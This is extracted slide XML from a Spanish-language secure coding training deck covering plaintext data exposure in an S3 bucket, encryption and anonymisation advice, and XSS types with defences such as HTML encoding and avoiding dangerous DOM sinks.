              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE739CCA-E65E-5C48-9610-378E29E2B701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7360920" y="1745659"/>
            <a:ext cx="4164059" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t>Si los datos sensibles no se protegen, un incidente de seguridad puede desencadenar en una filtración de datos de gran escala.</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DE6664-5E1E-25AB-A11A-2670FD57425B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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9658332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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>top.java</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Detalles personales y tarjetas de crédito almacenada en claro en un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bucket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> S3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105667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216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t>En resumen…</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type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1392381"/>
            <a:ext cx="10515600" cy="4914901"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Evite recolectar datos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>de personas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Anonimizar los datos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. Hashes seguros con sal pueden ser utilizados. Reemplazar datos clave con *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Utilice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>algoritmos criptográficamente fuertes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Toda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>comunicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> debe ser cifrada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La clasificación de datos es riesgosa. Ante la duda, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cifre todos los datos.</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3858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A5BF-0BA2-654A-A4BD-1C01C72AD1B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Proteger las Interfaces de Usuario web (UI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6ACF77-EC1C-A241-ADC3-A3B4E7180BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Aplicaciones empresariales utilizan UI web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTML es lindo, independiente de la plataforma y poderoso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bibliotecas como jQuery, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, VUE y Angular generan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Uis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> responsivas y versátiles.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181822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5BCBE-3919-7F4A-81DF-742A15A65F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="41000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AEA192-99CA-554F-8186-27DF5B4614F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281803" y="1825625"/>
            <a:ext cx="5071996" cy="4351338"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="28000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La habilidad de inyectar JavaScript arbitrario dentro de una página web:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reflejado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Almacenado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Basado en DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fácil de introducir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fácil de detectar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Permite brechas  de datos a través de ataques de falsificaciones de identidad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFFA066-8243-5F4F-8C04-2C3FCB0DC1DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="94000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="919619" y="2076146"/>
            <a:ext cx="5272129" cy="2334800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="55000" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39019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97A-4C58-BE46-ABD7-4B1054FFC074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456156" y="221075"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" b="1" dirty="0"/>
              <a:t>Defendiéndose de XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4CF125-C50A-6C41-A2F1-45D7DB8C3C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739454" y="1426718"/>
            <a:ext cx="10996390" cy="5050282"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Validación de entradas de datos ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Neutralizar Salidas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server Pages -&gt; Codificación de HTML (Escapeo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt; transforma a &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt; transforma a &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" transforma a &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>JavaScript (DOM XSS)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Atributos peligrosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Funciones peligrosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>setInterval</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CBE68A-BDB1-C848-BC5E-990C8F22BB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81867" y="1182106"/>
            <a:ext cx="3189889" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269648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97A-4C58-BE46-ABD7-4B1054FFC074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456156" y="221075"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" b="1" dirty="0"/>
              <a:t>Codificación de HTML neutraliza XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CBE68A-BDB1-C848-BC5E-990C8F22BB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3601" y="1400743"/>
            <a:ext cx="3044869" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F11802E-DB36-F448-A28D-982F051F4B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23590" y="1849841"/>
            <a:ext cx="8413003" cy="3516656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128947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B74973-79DF-714C-909D-0723420CF39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613459" y="3646026"/>
            <a:ext cx="8506790"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UY" sz="7200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
